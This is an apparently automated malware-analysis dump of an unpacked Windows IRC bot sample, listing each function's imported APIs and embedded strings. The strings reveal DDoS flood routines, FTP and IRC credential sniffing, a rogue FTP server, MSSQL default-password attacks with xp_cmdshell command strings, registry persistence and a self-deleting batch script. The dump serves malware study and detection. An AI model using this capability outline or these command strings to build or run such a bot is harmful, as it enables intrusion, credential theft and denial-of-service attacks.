"PAYPAL.COM" "paypal.com" "Set-Cookie:" </pre></td></tr><tr id="sub_41FE42"><td><pre><a name="sub_41FE42"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41FE42">sub_41FE42</a>(c049): KERNEL32.MultiByteToWideChar </pre></td></tr><tr id="sub_40AAF1"><td><pre><a name="sub_40AAF1"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AAF1">sub_40AAF1</a>(c0b1): KERNEL32.SearchPathA KERNEL32.CreateFileA KERNEL32.CloseHandle "explorer.exe" </pre></td></tr><tr id="sub_4010B2"><td><pre><a name="sub_4010B2"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4010B2">sub_4010B2</a>(c40b): WS2_32.WSAStartup WS2_32.WSASocketA WSOCK32.setsockopt WS2_32.ntohs WS2_32.ntohl WS2_32.sendto WS2_32.WSAGetLastError WS2_32.closesocket WS2_32.WSACleanup "ddos.syn" "ddos.ack" "ddos.random" </pre></td></tr><tr id="sub_40AE95"><td><pre><a name="sub_40AE95"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AE95">sub_40AE95</a>(c40e): WS2_32.inet_addr WS2_32.gethostbyname </pre></td></tr><tr id="sub_402E92"><td><pre><a name="sub_402E92"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402E92">sub_402E92</a>(c592): WS2_32.gethostname WS2_32.gethostbyname WS2_32.socket WS2_32.bind WS2_32.WSAGetLastError WS2_32.WSAIoctl WS2_32.closesocket WSOCK32.recv WS2_32.ntohs </pre></td></tr><tr id="sub_40DC10"><td><pre><a name="sub_40DC10"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DC10">sub_40DC10</a>(c7bc): WS2_32.send "NOTICE" "PRIVMSG" </pre></td></tr><tr id="sub_40DBCA"><td><pre><a name="sub_40DBCA"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DBCA">sub_40DBCA</a>(c85a): WS2_32.send </pre></td></tr><tr id="sub_40C738"><td><pre><a name="sub_40C738"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40C738">sub_40C738</a>(c8ef): ADVAPI32.RegCreateKeyExA ADVAPI32.RegSetValueExA ADVAPI32.RegDeleteValueA ADVAPI32.RegCloseKey "Windows System Update Tools" </pre></td></tr><tr id="sub_4078E6"><td><pre><a name="sub_4078E6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4078E6">sub_4078E6</a>(ca35): WS2_32.inet_addr KERNEL32.Sleep WS2_32.inet_ntoa </pre></td></tr><tr id="sub_40F326"><td><pre><a name="sub_40F326"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40F326">sub_40F326</a>(ccf3): WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.closesocket "%s\\drivers\\tcpip.sys" </pre></td></tr><tr id="sub_416885"><td><pre><a name="sub_416885"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_416885">sub_416885</a>(ce15): ADVAPI32.RegOpenKeyExA ADVAPI32.RegSetValueExA ADVAPI32.RegCloseKey KERNEL32.GetDriveTypeA "Software\\Microsoft\\OLE" "EnableDCOM" "SYSTEM\\CurrentControlSet\\Control\\Lsa" "restrictanonymous" "%c$" "%c:\\" </pre></td></tr><tr id="sub_419C82"><td><pre><a name="sub_419C82"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_419C82">sub_419C82</a>(ce53): KERNEL32.VirtualFree </pre></td></tr><tr id="sub_402E2D"><td><pre><a name="sub_402E2D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402E2D">sub_402E2D</a>(cfb4): "VULN sniff" "##sodoma_3" "OpenSSL/0.9.6" "Serv-U FTP Server" "OpenSSH_2" </pre></td></tr><tr id="sub_408FAC"><td><pre><a name="sub_408FAC"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_408FAC">sub_408FAC</a>(d3af): KERNEL32.GetProcAddress KERNEL32.GetEnvironmentVariableW "SeDebugPrivilege" "NTDLL.DLL" "NtQuerySystemInformation" "RtlCreateQueryDebugBuffer" "RtlQueryProcessDebugInformation" "RtlDestroyQueryDebugBuffer" "RtlRunDecodeUnicodeString" "SeDebugPrivilege" </pre></td></tr><tr id="sub_415B93"><td><pre><a name="sub_415B93"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_415B93">sub_415B93</a>(d3ca): KERNEL32.CreateToolhelp32Snapshot KERNEL32.Process32First KERNEL32.Process32Next KERNEL32.OpenProcess KERNEL32.CloseHandle KERNEL32.Module32First "SeDebugPrivilege" " %s (%d)" "SeDebugPrivilege" </pre></td></tr><tr id="sub_40CE56"><td><pre><a name="sub_40CE56"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40CE56">sub_40CE56</a>(d545): WSOCK32.recv WS2_32.ntohl WS2_32.send WS2_32.closesocket "%s%s" "a+b" </pre></td></tr><tr id="sub_40AD3F"><td><pre><a name="sub_40AD3F"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AD3F">sub_40AD3F</a>(d78e): "@echo off\r\nEcho REGEDIT4>%temp%\\1.reg\r\n"... "c:\\a.bat" </pre></td></tr><tr id="sub_40D8B7"><td><pre><a name="sub_40D8B7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D8B7">sub_40D8B7</a>(dc5b): KERNEL32.GetLogicalDriveStringsA </pre></td></tr><tr id="sub_416561"><td><pre><a name="sub_416561"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_416561">sub_416561</a>(dcb6): ADVAPI32.RegOpenKeyExA ADVAPI32.RegSetValueExA ADVAPI32.RegCloseKey "Software\\Microsoft\\OLE" "EnableDCOM" "SYSTEM\\CurrentControlSet\\Control\\Lsa" "restrictanonymous" </pre></td></tr><tr id="sub_40AA6F"><td><pre><a name="sub_40AA6F"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AA6F">sub_40AA6F</a>(dcfe): USER32.FindWindowA USER32.SendMessageA "mIRC" </pre></td></tr><tr id="sub_40AFAB"><td><pre><a name="sub_40AFAB"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AFAB">sub_40AFAB</a>(e076): WS2_32.getsockname "%d.%d.%d.%d" </pre></td></tr><tr id="sub_40B051"><td><pre><a name="sub_40B051"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B051">sub_40B051</a>(e0a3): "2" </pre></td></tr><tr id="sub_406A64"><td><pre><a name="sub_406A64"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_406A64">sub_406A64</a>(e1a1): WS2_32.WSAStartup WS2_32.socket WS2_32.ntohs WS2_32.connect WS2_32.send WSOCK32.recv WS2_32.closesocket WS2_32.WSACleanup "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"... </pre></td></tr><tr id="sub_404737"><td><pre><a name="sub_404737"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_404737">sub_404737</a>(e3f3): WS2_32.inet_addr WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.send WSOCK32.recv WS2_32.closesocket "Dcom135" </pre></td></tr><tr id="sub_40C4F7"><td><pre><a name="sub_40C4F7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40C4F7">sub_40C4F7</a>(e4b2): "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s" </pre></td></tr><tr id="sub_40DD32"><td><pre><a name="sub_40DD32"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DD32">sub_40DD32</a>(e9d7): ADVAPI32.OpenSCManagerA ADVAPI32.OpenServiceA ADVAPI32.ControlService ADVAPI32.StartServiceA ADVAPI32.DeleteService ADVAPI32.CloseServiceHandle </pre></td></tr><tr id="sub_408E5A"><td><pre><a name="sub_408E5A"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_408E5A">sub_408E5A</a>(ee8b): KERNEL32.FindFirstFileA "%s\\*" "%s\\%s" " Found: %s\\%s" </pre></td></tr><tr id="sub_408B8D"><td><pre><a name="sub_408B8D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_408B8D">sub_408B8D</a>(ef39): ADVAPI32.RegOpenKeyExA ADVAPI32.RegQueryValueExA ADVAPI32.RegCloseKey "%s\\%s" "r" "=" "=" </pre></td></tr><tr id="sub_40DF52"><td><pre><a name="sub_40DF52"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DF52">sub_40DF52</a>(f2dd): ADVAPI32.OpenSCManagerA ADVAPI32.EnumServicesStatusA ADVAPI32.CloseServiceHandle "The following Windows services are regi"... " Unknown" " Paused" " Pausing" " Continuing" " Running" " Stoping" " Starting" " Stopped" "%s: %s (%s)" </pre></td></tr><tr id="sub_40D7E5"><td><pre><a name="sub_40D7E5"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D7E5">sub_40D7E5</a>(f5ac): "failed" </pre></td></tr><tr id="sub_40BDAD"><td><pre><a name="sub_40BDAD"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40BDAD">sub_40BDAD</a>(f77b): ADVAPI32.GetUserNameA WS2_32.inet_addr WS2_32.gethostbyaddr "95" "NT" "98" "ME" "2K" "XP" "2003" "couldn't resolve host" "dd:MMM:yyyy" "HH:mm:ss" "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"... </pre></td></tr><tr id="sub_409307"><td><pre><a name="sub_409307"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_409307">sub_409307</a>(fcc3): KERNEL32.GetProcessHeap NTDLL.RtlAllocateHeap KERNEL32.ReadProcessMemory </pre></td></tr><tr id="sub_41FAC2"><td><pre><a name="sub_41FAC2"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41FAC2">sub_41FAC2</a>(fe6c): KERNEL32.WideCharToMultiByte </pre></td></tr><tr id="sub_40C8F3"><td><pre><a name="sub_40C8F3"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40C8F3">sub_40C8F3</a>(ffba): WS2_32.closesocket WSOCK32.recv "\n" </pre></td></tr></table><script> document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff"); </script> </html>

sub_outside():
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.inet_addr
	WS2_32.gethostbyname
	WS2_32.gethostbyaddr
	WS2_32.connect
	WS2_32.inet_ntoa
	WSOCK32.recv
	WS2_32.send
	WS2_32.closesocket
	KERNEL32.GetTickCount
	KERNEL32.SetErrorMode
	WS2_32.WSAStartup
	KERNEL32.CopyFileA
	KERNEL32.CloseHandle
	WS2_32.WSACleanup
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey
	KERNEL32.CreateThread
	WININET.InternetGetConnectedState
	KERNEL32.GetEnvironmentStringsW
	KERNEL32.WideCharToMultiByte

sub_40D6CA(019e):
	"%sKB"
	"failed"

sub_402D1F(078a):
	"FTP	sniff"
	"##sodoma_3"
	"NICK	"
	"220 "
	"230 "
	"USER	"
	"PASS	"

sub_40D091(0a22):
	WININET.InternetOpenUrlA
	WININET.InternetReadFile
	SHELL32.ShellExecuteA
	WS2_32.WSACleanup
	WININET.InternetCloseHandle

	"open"

sub_402CA9(0d1f):
	"IRC	sniff"
	"##sodoma_3"
	"OPER	"
	"NICK	"
	"oper	"
	"You are now an IRC Operator"

sub_4095E4(0e8b):
	KERNEL32.GetProcessHeap
	NTDLL.RtlRunDecodeUnicodeString

sub_406B85(1118):
	WS2_32.socket
	WS2_32.WSAGetLastError
	WS2_32.ntohs
	WS2_32.bind
	WS2_32.select
	WSOCK32.recvfrom
	WS2_32.inet_ntoa
	WS2_32.sendto
	WS2_32.closesocket

	"octet"
	"rb"

sub_40C1D5(13b0):
	WININET.InternetCrackUrlA
	WININET.InternetConnectA
	WININET.HttpOpenRequestA
	WININET.HttpSendRequestA
	WININET.InternetCloseHandle

sub_405A6A(1570):
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.bind
	WS2_32.listen
	WS2_32.ioctlsocket
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WSOCK32.recv
	WS2_32.closesocket
	WS2_32.WSAGetLastError

	"GET	"
	" "
	"\r\n"

sub_405350(1824):
	WS2_32.send

	"220 NzmxFtpd 0wns j0\n"
	"%s %s"
	"USER"
	"331 Password required\n"
	"PASS"
	"230 User logged in.\n"
	"SYST"
	"215 NzmxFtpd\n"
	"REST"
	"350 Restarting.\n"
	"257 \"/\" is current directory.\n"
	"TYPE"
	"A"
	"200 Type set to A.\n"
	"TYPE"
	"I"
	"200 Type set to I.\n"
	"PASV"
	"425 Passive not supported on this serve"...
	"LIST"
	"226 Transfer complete\n"
	"PORT"
	"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
	"%x%x\n"
	"%s.%s.%s.%s"
	"200 PORT command successful.\n"
	"RETR"
	"150 Opening BINARY mode data connection"...
	"226 Transfer complete.\n"
	"425 Can't open data connection.\n"
	"QUIT"
	"221 Goodbye happy r00ting.\n"

sub_40CAB4(1a7b):
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.bind
	WS2_32.getsockname
	WS2_32.listen
	WS2_32.inet_addr
	WS2_32.ntohl
	WS2_32.select
	WS2_32.accept
	WS2_32.closesocket
	WS2_32.send
	WSOCK32.recv
	WS2_32.inet_ntoa

sub_407F51(1de1):
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.bind
	WS2_32.listen
	WS2_32.accept
	WS2_32.inet_ntoa
	WS2_32.closesocket
	WS2_32.select
	WSOCK32.recv
	WS2_32.send
	WS2_32.WSAGetLastError
	WS2_32.connect

sub_40851A(1f65):
	GDI32.CreateDCA
	GDI32.GetDeviceCaps
	GDI32.CreateCompatibleDC
	GDI32.CreateDIBSection
	GDI32.SelectObject
	GDI32.BitBlt
	GDI32.GetDIBColorTable
	GDI32.DeleteObject
	GDI32.DeleteDC

	"DISPLAY"

sub_407599(22a3):
	"%d.%d.%d.%d"

sub_40C061(23e7):
	WININET.InternetGetConnectedStateExA

	"[NETINFO]: [Type]: %s	(%s). [IP Address"...

sub_40DA5C(24da):
	WS2_32.inet_addr
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.connect
	WS2_32.send
	WSOCK32.recv
	WS2_32.closesocket

sub_40182E(25a4):
	"[SUPERSYN]: Done with	flood (%iKB/sec)"

sub_402822(268b):
	WS2_32.ntohs
	WS2_32.inet_addr
	WS2_32.socket
	WS2_32.WSAGetLastError
	WS2_32.bind
	WS2_32.closesocket
	WS2_32.WSAIoctl
	WSOCK32.recv
	WS2_32.inet_ntoa

	"[PSNIFF]"

sub_407146(28ed):
	WS2_32.inet_ntoa

sub_40AA34(2974):
	USER32.OpenClipboard
	USER32.GetClipboardData
	USER32.CloseClipboard

sub_408755(2bb5):
	USER32.IsWindow
	USER32.SendMessageA
	USER32.DestroyWindow

	"Window"

sub_416343(2fa7):
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WS2_32.inet_ntoa
	WS2_32.closesocket

sub_40ADFD(323b):
	"."

sub_40C7FB(3339):
	"rb"

sub_40841A(3672):
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WSOCK32.recv
	WS2_32.send

sub_407551(3b1d):
	WS2_32.ntohl

sub_4062F7(3ddb):
	WS2_32.send

	"\n"
	"PRIVMSG %s :Searching	for: %s\r\n"
	"\r\n\r\nIndex of %s</TIT"...
	"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
	"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
	".."
	"."
	"PM"
	"AM"
	"%2.2d/%2.2d/%4d  %2.2d:%2.2d %s"
	"<%s>"
	"PRIVMSG %s :%-31s  %-21s\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s/"
	"\"><CODE>%.29s>/</CODE></A>"
	"\"><CODE>%s/</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"<%s>"
	"%-31s  %-21s\r\n"
	"PRIVMSG %s :%-31s  %-21s (%s bytes)\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s"
	"\"><CODE>%.30s></CODE></A>"
	"\"><CODE>%s</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"%-31s  %-21s (%i bytes)\r\n"
	"PRIVMSG %s :Found %s Files and %s Direc"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr><tr id="sub_40E284"><td><pre><a name="sub_40E284"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E284"><font size=+2>sub_40E284</a>(3fe3)</font>:<font color=darkgreen>
	ADVAPI32.IsValidSecurityDescriptor</font>
<font color=brown>
	"Share	name:	 Resource:		 "...
	"Yes"
	"No"
	"%-14S %-24S %-6u %-4s"
</font></pre></td></tr><tr id="sub_40BBF6"><td><pre><a name="sub_40BBF6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40BBF6"><font size=+2>sub_40BBF6</a>(423a)</font>:<font color=brown>
	"%dd %dh %dm"
</font></pre></td></tr><tr id="sub_416F93"><td><pre><a name="sub_416F93"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_416F93"><font size=+2>sub_416F93</a>(42e0)</font>:<font color=darkgreen>
	WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_40D93C"><td><pre><a name="sub_40D93C"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D93C"><font size=+2>sub_40D93C</a>(43c6)</font>:<font color=darkgreen>
	WS2_32.closesocket
	WS2_32.WSACleanup
	KERNEL32.Sleep
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B0A0"><td><pre><a name="sub_40B0A0"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B0A0"><font size=+2>sub_40B0A0</a>(4691)</font>:<font color=brown>
	"sfc_os.dll"
</font></pre></td></tr><tr id="sub_41EE5D"><td><pre><a name="sub_41EE5D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41EE5D"><font size=+2>sub_41EE5D</a>(4bef)</font>:<font color=darkgreen>
	KERNEL32.GetProcAddress
	USER32.GetActiveWindow
	USER32.GetLastActivePopup
	USER32.MessageBoxA</font>
<font color=brown>
	"user32.dll"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"
</font></pre></td></tr><tr id="sub_40ABB7"><td><pre><a name="sub_40ABB7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40ABB7"><font size=+2>sub_40ABB7</a>(4c5f)</font>:<font color=brown>
	"%sdel.bat"
	"@echo	off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
	"%%comspec%% /c %s	%s"
</font></pre></td></tr><tr id="sub_406047"><td><pre><a name="sub_406047"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_406047"><font size=+2>sub_406047</a>(4c69)</font>:<font color=darkgreen>
	WS2_32.closesocket</font>
<font color=brown>
	"\\%s"
	"%s%s"
	"\n"
	"*"
</font></pre></td></tr><tr id="sub_416233"><td><pre><a name="sub_416233"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_416233"><font size=+2>sub_416233</a>(4ec8)</font>:<font color=darkgreen>
	USER32.FindWindowA</font>
<font color=brown>
	"mIRC"
</font></pre></td></tr><tr id="sub_404969"><td><pre><a name="sub_404969"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_404969"><font size=+2>sub_404969</a>(505f)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown>
	"sa"
	"root"
	"admin"
	"DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
	"EXEC master..xp_cmdshell 'del eq&echo o"...
	"EXEC master..xp_cmdshell '%s'"
	"Dcom135"
</font></pre></td></tr><tr id="sub_5C3797"><td><pre><a name="sub_5C3797"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_5C3797"><font size=+2>sub_5C3797</a>(513b)</font>:<font color=darkgreen>
	KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_4094AE"><td><pre><a name="sub_4094AE"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4094AE"><font size=+2>sub_4094AE</a>(5197)</font>:<font color=darkgreen>
	KERNEL32.GetProcessHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_4033C9"><td><pre><a name="sub_4033C9"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4033C9"><font size=+2>sub_4033C9</a>(525d)</font>:<font color=darkgreen>
	WS2_32.send
	WS2_32.recv</font>
<font color=brown></font></pre></td></tr><tr id="sub_407B45"><td><pre><a name="sub_407B45"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_407B45"><font size=+2>sub_407B45</a>(5576)</font>:<font color=darkgreen>
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.WSAAsyncSelect
	WS2_32.bind
	WS2_32.listen
	WS2_32.accept
	WS2_32.inet_ntoa
	WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_405EC5"><td><pre><a name="sub_405EC5"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_405EC5"><font size=+2>sub_405EC5</a>(5a57)</font>:<font color=darkgreen>
	WS2_32.send
	WS2_32.closesocket</font>
<font color=brown>
	"text/html"
	"application/octet-stream"
	"ddd, dd	MMM yyyy"
	"HH:mm:ss"
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
</font></pre></td></tr><tr id="sub_40D682"><td><pre><a name="sub_40D682"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D682"><font size=+2>sub_40D682</a>(5b85)</font>:<font color=darkgreen>
	KERNEL32.GetDiskFreeSpaceExA</font>
<font color=brown></font></pre></td></tr><tr id="sub_40A9AA"><td><pre><a name="sub_40A9AA"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40A9AA"><font size=+2>sub_40A9AA</a>(5bd7)</font>:<font color=brown>
	"%s	Error: %s <%d>."
</font></pre></td></tr><tr id="sub_41F7F0"><td><pre><a name="sub_41F7F0"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41F7F0"><font size=+2>sub_41F7F0</a>(6338)</font>:<font color=brown>
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"
</font></pre></td></tr><tr id="sub_40DDD4"><td><pre><a name="sub_40DDD4"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DDD4"><font size=+2>sub_40DDD4</a>(6353)</font>:<font color=brown>
	"The specified	service	name is	invalid."
	"The requested	control	code is	undefined"...
	"The handle is	invalid."
	"The handle does not have the required	a"...
	"The service binary file could	not be fo"...
	"The service cannot be	stopped	because	o"...
	"The database is locked."
	"A thread could not be	created	for the	s"...
	"The process for the service was started"...
	"The requested	control	code is	not valid"...
	"An instance of the service is	already	r"...
	"The system is	shutting down."
	"An unknown error occurred: <%ld>"
</font></pre></td></tr><tr id="sub_409794"><td><pre><a name="sub_409794"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_409794"><font size=+2>sub_409794</a>(658e)</font>:<font color=darkgreen>
	KERNEL32.GetModuleHandleA
	KERNEL32.GetProcAddress
	KERNEL32.LoadLibraryA
	WININET.InternetOpenA</font>
<font color=brown>
	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"icmp.dll"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
	"avicap32.dll"
	"capCreateCaptureWindowA"
	"capGetDriverDescriptionA"
</font></pre></td></tr><tr id="sub_4018CA"><td><pre><a name="sub_4018CA"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4018CA"><font size=+2>sub_4018CA</a>(6960)</font>:<font color=darkgreen>
	WS2_32.ntohs</font>
<font color=brown></font></pre></td></tr><tr id="sub_415B28"><td><pre><a name="sub_415B28"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_415B28"><font size=+2>sub_415B28</a>(6a64)</font>:<font color=darkgreen>
	ADVAPI32.OpenProcessToken
	ADVAPI32.LookupPrivilegeValueA
	ADVAPI32.AdjustTokenPrivileges</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B0E7"><td><pre><a name="sub_40B0E7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B0E7"><font size=+2>sub_40B0E7</a>(6b9c)</font>:<font color=brown>
	"r+b"
	"Can not open TCPIP.SYS, version %d."
	"TCPIP.SYS fixed, version %d."
	"##sodoma_3t"
</font></pre></td></tr><tr id="sub_40BA41"><td><pre><a name="sub_40BA41"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40BA41"><font size=+2>sub_40BA41</a>(6c22)</font>:<font color=darkgreen>
	KERNEL32.SearchPathA
	KERNEL32.CreatePipe
	KERNEL32.GetCurrentProcess
	KERNEL32.CloseHandle</font>
<font color=brown>
	"cmd.exe"
